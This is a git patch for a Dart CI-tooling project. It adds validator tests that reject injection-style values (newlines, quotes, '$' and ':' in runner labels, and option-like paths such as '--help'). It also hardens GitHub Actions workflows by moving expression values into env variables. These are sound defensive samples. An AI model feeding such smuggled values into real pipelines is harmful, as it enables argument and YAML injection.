newline produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: '12\n0'), + ); + expect(errors, anyElement(contains('newlines or control'))); + }); + + test('string line_length "0" produces error (out of range)', () { + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: '0'), + ); + expect(errors, anyElement(contains('between 1 and 10000'))); + }); + + test('string line_length "10001" produces error (out of range)', () { + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: '10001'), + ); + expect(errors, anyElement(contains('between 1 and 10000'))); + }); + + test('int line_length 0 produces error (out of range)', () { + final errors = WorkflowGenerator.validate(_validConfig(lineLength: 0)); + expect(errors, anyElement(contains('between 1 and 10000'))); + }); + + test('int line_length 10001 produces error (out of range)', () { + final errors = WorkflowGenerator.validate( + _validConfig(lineLength: 10001), + ); + expect(errors, anyElement(contains('between 1 and 10000'))); + }); }); // ---- sub_packages (Issue #9 validation) ---- @@ -371,6 +472,17 @@ void main() { expect(errors, anyElement(contains('name must be a non-empty string'))); }); + test('sub_packages with name containing unsupported characters produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo bar', 'path': 'packages/foo'}, + ], + ), + ); + expect(errors, anyElement(contains('name contains unsupported characters'))); + }); + test('sub_packages with missing path produces error', () { final errors = WorkflowGenerator.validate( _validConfig( @@ -446,6 +558,28 @@ void main() { expect(errors, anyElement(contains('must be a relative repo path'))); }); + test('sub_packages path "." (repo root) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': '.'}, + ], + ), + ); + expect(errors, anyElement(contains('must not be repo root'))); + }); + + test('sub_packages path starting with "-" produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + subPackages: [ + {'name': 'foo', 'path': '--help'}, + ], + ), + ); + expect(errors, anyElement(contains('must not start with "-"'))); + }); + test('sub_packages path with backslashes produces error', () { final errors = WorkflowGenerator.validate( _validConfig( @@ -580,12 +714,56 @@ void main() { expect(errors, anyElement(contains('must be a non-empty string'))); }); + test('runner_overrides value with surrounding whitespace produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(runnerOverrides: {'ubuntu': ' custom-runner '}), + ); + expect(errors, anyElement(contains('leading/trailing whitespace'))); + }); + test('valid runner_overrides passes', () { final errors = WorkflowGenerator.validate( _validConfig(runnerOverrides: {'ubuntu': 'custom-runner-label'}), ); expect(errors.where((e) => e.contains('runner_overrides')), isEmpty); }); + + test('runner_overrides value with newline produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(runnerOverrides: {'ubuntu': 'runner\nlabel'}), + ); + expect(errors, anyElement(contains('newlines, control chars'))); + }); + + test('runner_overrides value with tab produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(runnerOverrides: {'ubuntu': 'runner\tlabel'}), + ); + expect(errors, anyElement(contains('newlines, control chars'))); + }); + + test('runner_overrides value with YAML-injection char produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(runnerOverrides: {'ubuntu': 'runner:label'}), + ); + expect(errors, anyElement(contains('unsafe YAML chars'))); + }); + + test('runner_overrides value with dollar sign produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(runnerOverrides: {'ubuntu': r'runner$label'}), + ); + expect(errors, anyElement(contains('unsafe YAML chars'))); + }); + + test('runner_overrides value with hyphen and dot passes', () { + final errors = WorkflowGenerator.validate( + _validConfig( + runnerOverrides: {'ubuntu': 'runtime-ubuntu-24.04-x64-256gb'}, + ), + ); + expect(errors.where((e) => e.contains('runner_overrides')), isEmpty); + }); }); // ---- web_test ---- @@ -750,6 +928,17 @@ void main() { }, ); + test('web_test.paths with single quote produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': ["test/web/foo'bar_test.dart"], + }, + ), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }); + test('web_test.paths duplicate (after normalization) produces error', () { final errors = WorkflowGenerator.validate( _validConfig( @@ -806,6 +995,28 @@ void main() { expect(errors, anyElement(contains('must be a relative repo path'))); }); + test('web_test.paths "." (repo root) produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': ['.'], + }, + ), + ); + expect(errors, anyElement(contains('must not be repo root'))); + }); + + test('web_test.paths starting with "-" produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig( + webTest: { + 'paths': ['--help'], + }, + ), + ); + expect(errors, anyElement(contains('must not start with "-"'))); + }); + test('web_test.paths with newline produces error', () { final errors = WorkflowGenerator.validate( _validConfig( @@ -1044,7 +1255,7 @@ void main() { final errors = WorkflowGenerator.validate({ // missing dart_sdk, missing features }); - expect(errors.length, greaterThanOrEqualTo(2)); + expect(errors.length, equals(2)); expect(errors, anyElement(contains('dart_sdk'))); expect(errors, anyElement(contains('features'))); }); @@ -1150,16 +1361,27 @@ void main() { Map _minimalValidConfig({ bool webTest = false, Map? webTestConfig, + Map? featureOverrides, + List? platforms, }) { + final features = { + 'proto': false, + 'lfs': false, + 'format_check': false, + 'analysis_cache': false, + 'managed_analyze': false, + 'managed_test': false, + 'build_runner': false, + 'web_test': webTest, + }; + if (featureOverrides != null) { + features.addAll(featureOverrides); + } + features['web_test'] = webTest; return _validConfig( dartSdk: '3.9.2', - features: { - 'proto': false, - 'lfs': false, - 'format_check': false, - 'web_test': webTest, - }, - platforms: ['ubuntu'], + features: features, + platforms: platforms ?? ['ubuntu'], webTest: webTestConfig, ); } @@ -1283,6 +1505,7 @@ void main() { final rendered = gen.render(); expect(rendered, contains("'test/web/foo_test.dart'")); expect(rendered, contains('--concurrency=2')); + expect(rendered, contains('-- \'test/web/foo_test.dart\'')); }); test( @@ -1299,5 +1522,160 @@ void main() { expect(rendered, contains('--concurrency=32')); }, ); + + test('rendered output parses as valid YAML with jobs map', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final jobs = parsed['jobs'] as YamlMap; + expect(jobs.containsKey('pre-check'), isTrue); + }); + + test('feature flags render expected snippets', () { + final cases = >[ + {'feature': 'proto', 'snippet': 'Install protoc'}, + {'feature': 'lfs', 'snippet': 'lfs: true'}, + {'feature': 'format_check', 'snippet': 'auto-format:'}, + {'feature': 'analysis_cache', 'snippet': 'Cache Dart analysis'}, + {'feature': 'managed_analyze', 'snippet': 'runtime_ci_tooling:manage_cicd analyze'}, + {'feature': 'managed_test', 'snippet': 'runtime_ci_tooling:manage_cicd test'}, + {'feature': 'build_runner', 'snippet': 'Run build_runner'}, + ]; + + for (final c in cases) { + final feature = c['feature']!; + final snippet = c['snippet']!; + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(featureOverrides: {feature: true}), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, contains(snippet), reason: 'Feature "$feature" should render "$snippet".'); + } + }); + + test('build_runner=false omits build_runner step', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(featureOverrides: {'build_runner': false}), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + expect(rendered, isNot(contains('Run build_runner'))); + }); + + test('multi-platform render emits analyze + matrix test jobs', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(platforms: ['ubuntu', 'macos']), + toolingVersion: '0.0.0-test', + ); + final rendered = gen.render(); + final parsed = loadYaml(rendered) as YamlMap; + final jobs = parsed['jobs'] as YamlMap; + + expect(jobs.containsKey('analyze'), isTrue); + expect(jobs.containsKey('test'), isTrue); + expect(jobs.containsKey('analyze-and-test'), isFalse); + + final testJob = jobs['test'] as YamlMap; + final strategy = testJob['strategy'] as YamlMap; + final matrix = strategy['matrix'] as YamlMap; + final include = matrix['include'] as YamlList; + expect(include.length, equals(2)); + }); + + // ---- render(existingContent) / _preserveUserSections ---- + group('render(existingContent) preserves user sections', () { + test('user section content is preserved when existingContent has custom lines in a user block', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final base = gen.render(); + // Append a user block with content so extraction finds it (first occurrence is empty) + const customBlock = ''' +# --- BEGIN USER: pre-test --- + - name: Custom pre-test step + run: echo "user-added" +# --- END USER: pre-test --- +'''; + final existing = base + customBlock; + final rendered = gen.render(existingContent: existing); + expect(rendered, contains('Custom pre-test step')); + expect(rendered, contains('user-added')); + expect(rendered, contains('# --- BEGIN USER: pre-test ---')); + expect(rendered, contains('# --- END USER: pre-test ---')); + }); + + test('CRLF normalization: existing content with \\r\\n still preserves sections', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final base = gen.render(); + const customContent = '\r\n - run: echo "crlf-test"\r\n'; + final existing = base.replaceFirst( + '# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---', + '# --- BEGIN USER: pre-test ---$customContent# --- END USER: pre-test ---', + ); + final rendered = gen.render(existingContent: existing); + expect(rendered, contains('crlf-test')); + expect(rendered, contains('# --- BEGIN USER: pre-test ---')); + }); + + test('multiple user sections preserve independently', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final base = gen.render(); + var existing = base; + existing = existing.replaceFirst( + '# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---', + '# --- BEGIN USER: pre-test ---\n - run: echo pre\n# --- END USER: pre-test ---', + ); + existing = existing.replaceFirst( + '# --- BEGIN USER: post-test ---\n# --- END USER: post-test ---', + '# --- BEGIN USER: post-test ---\n - run: echo post\n# --- END USER: post-test ---', + ); + existing = existing.replaceFirst( + '# --- BEGIN USER: extra-jobs ---\n# --- END USER: extra-jobs ---', + '# --- BEGIN USER: extra-jobs ---\n custom-job:\n runs-on: ubuntu-latest\n# --- END USER: extra-jobs ---', + ); + final rendered = gen.render(existingContent: existing); + expect(rendered, contains('echo pre')); + expect(rendered, contains('echo post')); + expect(rendered, contains('custom-job:')); + expect(rendered, contains('runs-on: ubuntu-latest')); + }); + + test('empty/whitespace-only existing user section does not overwrite rendered section', () { + final gen = WorkflowGenerator( + ciConfig: _minimalValidConfig(), + toolingVersion: '0.0.0-test', + ); + final base = gen.render(); + // Existing has pre-test with only whitespace; post-test has real content + final existing = base + .replaceFirst( + '# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---', + '# --- BEGIN USER: pre-test ---\n \n \t \n# --- END USER: pre-test ---', + ) + .replaceFirst( + '# --- BEGIN USER: post-test ---\n# --- END USER: post-test ---', + '# --- BEGIN USER: post-test ---\n - run: echo kept\n# --- END USER: post-test ---', + ); + final rendered = gen.render(existingContent: existing); + // pre-test: whitespace-only was skipped, so rendered keeps empty placeholder + expect( + rendered, + contains('# --- BEGIN USER: pre-test ---\n# --- END USER: pre-test ---'), + ); + // post-test: real content was preserved + expect(rendered, contains('echo kept')); + }); + }); }); } From 62e9c5a97166e0ba116ae90aec35b8397c5547f0 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 20:46:36 -0500 Subject: [PATCH 08/16] fix: broaden CI dart formatting and safe staging Format checks now run across the repository and stage only tracked *.dart changes, preventing unrelated files from being committed while still capturing non-lib Dart edits. Regenerated workflow templates and synced related docs/template metadata. --- .github/workflows/ci.yaml | 6 +- .github/workflows/issue-triage.yaml | 14 +- .github/workflows/release.yaml | 186 +++++++++++--------- .runtime_ci/template_versions.json | 20 +-- USAGE.md | 4 +- templates/config.json | 3 +- templates/github/workflows/ci.skeleton.yaml | 4 +- 7 files changed, 133 insertions(+), 104 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index ac6ba13..b32b0e0 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -57,7 +57,7 @@ jobs: sdk: "3.9.2" - name: Format code - run: dart format --line-length 120 lib/ + run: dart format --line-length 120 . - name: Commit and push formatting id: format-push @@ -65,7 +65,7 @@ jobs: if ! git diff --quiet; then git config user.name "github-actions[bot]" git config user.email "41898282+github-actions[bot]@users.noreply.github.com" - git add lib/ + git add -u -- '*.dart' git commit -m "bot(format): apply dart format --line-length 120 [skip ci]" if git push; then echo "sha=$(git rev-parse HEAD)" >> "$GITHUB_OUTPUT" @@ -174,6 +174,7 @@ jobs: key: ${{ runner.os }}-${{ runner.arch }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-${{ runner.arch }}-dart-pub- + # ── shared:proto-setup ── keep in sync with single_platform ── # ── shared:pub-get ── keep in sync with single_platform ── - run: dart pub get env: @@ -192,7 +193,6 @@ jobs: set -o pipefail mkdir -p "$TEST_LOG_DIR" dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$TEST_LOG_DIR/console.log" - exit ${PIPESTATUS[0]} env: TEST_LOG_DIR: ${{ runner.temp }}/test-logs PLATFORM_ID: ${{ matrix.platform_id }} diff --git a/.github/workflows/issue-triage.yaml b/.github/workflows/issue-triage.yaml index 80c74f4..3924e03 100644 --- a/.github/workflows/issue-triage.yaml +++ b/.github/workflows/issue-triage.yaml @@ -50,12 +50,13 @@ jobs: - name: Configure Git for HTTPS with Token if: steps.trigger.outputs.run == 'true' shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - uses: dart-lang/setup-dart@v1.7.1 if: steps.trigger.outputs.run == 'true' @@ -93,4 +94,5 @@ jobs: env: GEMINI_API_KEY: ${{ secrets.CICD_GEMINI_API_KEY_OPEN_RUNTIME }} GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - run: dart run runtime_ci_tooling:triage_cli ${{ github.event.issue.number }} + ISSUE_NUMBER: ${{ github.event.issue.number }} + run: dart run runtime_ci_tooling:triage_cli "$ISSUE_NUMBER" diff --git a/.github/workflows/release.yaml b/.github/workflows/release.yaml index 2f1b797..1f693b9 100644 --- a/.github/workflows/release.yaml +++ b/.github/workflows/release.yaml @@ -69,12 +69,13 @@ jobs: - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - uses: dart-lang/setup-dart@v1.7.1 with: @@ -142,12 +143,13 @@ jobs: - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - uses: dart-lang/setup-dart@v1.7.1 with: @@ -180,17 +182,19 @@ jobs: env: GEMINI_API_KEY: ${{ secrets.CICD_GEMINI_API_KEY_OPEN_RUNTIME }} GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PREV_TAG: ${{ needs.determine-version.outputs.prev_tag }} + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | dart run runtime_ci_tooling:manage_cicd triage pre-release \ - --prev-tag "${{ needs.determine-version.outputs.prev_tag }}" \ - --version "${{ needs.determine-version.outputs.new_version }}" + --prev-tag "$PREV_TAG" \ + --version "$NEW_VERSION" # Find manifest from .runtime_ci/runs/ audit trail MANIFEST=$(find .runtime_ci/runs -name "issue_manifest.json" -type f 2>/dev/null | sort -r | head -1) if [ -n "$MANIFEST" ]; then cp "$MANIFEST" /tmp/issue_manifest.json else - echo '{"version":"${{ needs.determine-version.outputs.new_version }}","github_issues":[],"sentry_issues":[],"cross_repo_issues":[]}' > /tmp/issue_manifest.json + echo "{\"version\":\"${NEW_VERSION}\",\"github_issues\":[],\"sentry_issues\":[],\"cross_repo_issues\":[]}" > /tmp/issue_manifest.json fi - uses: actions/upload-artifact@v6.0.0 @@ -223,12 +227,13 @@ jobs: - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - uses: dart-lang/setup-dart@v1.7.1 with: @@ -266,10 +271,12 @@ jobs: env: GEMINI_API_KEY: ${{ secrets.CICD_GEMINI_API_KEY_OPEN_RUNTIME }} GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PREV_TAG: ${{ needs.determine-version.outputs.prev_tag }} + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | dart run runtime_ci_tooling:manage_cicd explore \ - --prev-tag "${{ needs.determine-version.outputs.prev_tag }}" \ - --version "${{ needs.determine-version.outputs.new_version }}" + --prev-tag "$PREV_TAG" \ + --version "$NEW_VERSION" - name: Create fallback stage1 artifacts if missing run: | @@ -311,12 +318,13 @@ jobs: - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - uses: dart-lang/setup-dart@v1.7.1 with: @@ -359,19 +367,23 @@ jobs: env: GEMINI_API_KEY: ${{ secrets.CICD_GEMINI_API_KEY_OPEN_RUNTIME }} GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PREV_TAG: ${{ needs.determine-version.outputs.prev_tag }} + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | dart run runtime_ci_tooling:manage_cicd compose \ - --prev-tag "${{ needs.determine-version.outputs.prev_tag }}" \ - --version "${{ needs.determine-version.outputs.new_version }}" + --prev-tag "$PREV_TAG" \ + --version "$NEW_VERSION" - name: Documentation update env: GEMINI_API_KEY: ${{ secrets.CICD_GEMINI_API_KEY_OPEN_RUNTIME }} GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PREV_TAG: ${{ needs.determine-version.outputs.prev_tag }} + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | dart run runtime_ci_tooling:manage_cicd documentation \ - --prev-tag "${{ needs.determine-version.outputs.prev_tag }}" \ - --version "${{ needs.determine-version.outputs.new_version }}" + --prev-tag "$PREV_TAG" \ + --version "$NEW_VERSION" - uses: actions/upload-artifact@v6.0.0 with: @@ -410,12 +422,13 @@ jobs: - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - name: Set up Dart uses: dart-lang/setup-dart@v1.7.1 @@ -510,12 +523,13 @@ jobs: - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN || secrets.GITHUB_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - uses: dart-lang/setup-dart@v1.7.1 with: @@ -585,30 +599,34 @@ jobs: env: GEMINI_API_KEY: ${{ secrets.CICD_GEMINI_API_KEY_OPEN_RUNTIME }} GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PREV_TAG: ${{ needs.determine-version.outputs.prev_tag }} + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | dart run runtime_ci_tooling:manage_cicd release-notes \ - --prev-tag "${{ needs.determine-version.outputs.prev_tag }}" \ - --version "${{ needs.determine-version.outputs.new_version }}" + --prev-tag "$PREV_TAG" \ + --version "$NEW_VERSION" # Consolidate all release notes files under .runtime_ci/release_notes/ before upload. # Mixing relative and absolute paths in upload-artifact causes path # resolution issues. Keep everything under one root. - name: Consolidate release notes + env: + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | - VERSION="${{ needs.determine-version.outputs.new_version }}" - mkdir -p ".runtime_ci/release_notes/v${VERSION}" - cp /tmp/release_notes_body.md ".runtime_ci/release_notes/v${VERSION}/" 2>/dev/null || true - cp /tmp/migration_guide.md ".runtime_ci/release_notes/v${VERSION}/" 2>/dev/null || true - echo "Contents of .runtime_ci/release_notes/v${VERSION}/:" - ls -la ".runtime_ci/release_notes/v${VERSION}/" 2>/dev/null || echo "(empty)" + mkdir -p ".runtime_ci/release_notes/v${NEW_VERSION}" + cp /tmp/release_notes_body.md ".runtime_ci/release_notes/v${NEW_VERSION}/" 2>/dev/null || true + cp /tmp/migration_guide.md ".runtime_ci/release_notes/v${NEW_VERSION}/" 2>/dev/null || true + echo "Contents of .runtime_ci/release_notes/v${NEW_VERSION}/:" + ls -la ".runtime_ci/release_notes/v${NEW_VERSION}/" 2>/dev/null || echo "(empty)" - name: Ensure release notes artifact is non-empty shell: bash + env: + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | - VERSION="${{ needs.determine-version.outputs.new_version }}" - mkdir -p ".runtime_ci/release_notes/v${VERSION}" - if [ ! -f ".runtime_ci/release_notes/v${VERSION}/release_notes_body.md" ]; then - echo "Release notes unavailable for v${VERSION}." > ".runtime_ci/release_notes/v${VERSION}/release_notes_body.md" + mkdir -p ".runtime_ci/release_notes/v${NEW_VERSION}" + if [ ! -f ".runtime_ci/release_notes/v${NEW_VERSION}/release_notes_body.md" ]; then + echo "Release notes unavailable for v${NEW_VERSION}." > ".runtime_ci/release_notes/v${NEW_VERSION}/release_notes_body.md" echo "Created fallback release_notes_body.md" fi @@ -646,12 +664,13 @@ jobs: - name: Configure Git for HTTPS with Token shell: bash + env: + GH_PAT: ${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN }} run: | - TOKEN="${{ secrets.TSAVO_AT_PIECES_PERSONAL_ACCESS_TOKEN }}" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "git@github.com:" - git config --global url."https://x-access-token:${TOKEN}@github.com/".insteadOf "ssh://git@github.com/" - git config --global url."https://x-access-token:${TOKEN}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" - git config --global url."https://x-access-token:${TOKEN}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "git@github.com:" + git config --global url."https://x-access-token:${GH_PAT}@github.com/".insteadOf "ssh://git@github.com/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/open-runtime/".insteadOf "git@github.com:open-runtime/" + git config --global url."https://x-access-token:${GH_PAT}@github.com/pieces-app/".insteadOf "git@github.com:pieces-app/" - uses: dart-lang/setup-dart@v1.7.1 with: @@ -693,34 +712,35 @@ jobs: merge-multiple: false - name: Prepare artifacts + env: + NEW_VERSION: ${{ needs.determine-version.outputs.new_version }} run: | - VERSION="${{ needs.determine-version.outputs.new_version }}" - mkdir -p ./artifacts ./.runtime_ci/version_bumps "./.runtime_ci/release_notes/v${VERSION}" + mkdir -p ./artifacts ./.runtime_ci/version_bumps "./.runtime_ci/release_notes/v${NEW_VERSION}" # Stage 3 release notes: downloaded artifact has release_notes/ root # so files land at ./release-notes-artifacts/vX.X.X/release_notes.md - if [ -d "./release-notes-artifacts/v${VERSION}" ]; then - cp -r "./release-notes-artifacts/v${VERSION}/"* "./.runtime_ci/release_notes/v${VERSION}/" 2>/dev/null || true - echo "Copied Stage 3 artifacts from release-notes-artifacts/v${VERSION}/" + if [ -d "./release-notes-artifacts/v${NEW_VERSION}" ]; then + cp -r "./release-notes-artifacts/v${NEW_VERSION}/"* "./.runtime_ci/release_notes/v${NEW_VERSION}/" 2>/dev/null || true + echo "Copied Stage 3 artifacts from release-notes-artifacts/v${NEW_VERSION}/" elif [ -d "./release-notes-artifacts" ]; then # Fallback: search recursively for release_notes.md FOUND=$(find ./release-notes-artifacts -name "release_notes.md" -type f 2>/dev/null | head -1) if [ -n "$FOUND" ]; then - cp "$(dirname "$FOUND")"/* "./.runtime_ci/release_notes/v${VERSION}/" 2>/dev/null || true + cp "$(dirname "$FOUND")"/* 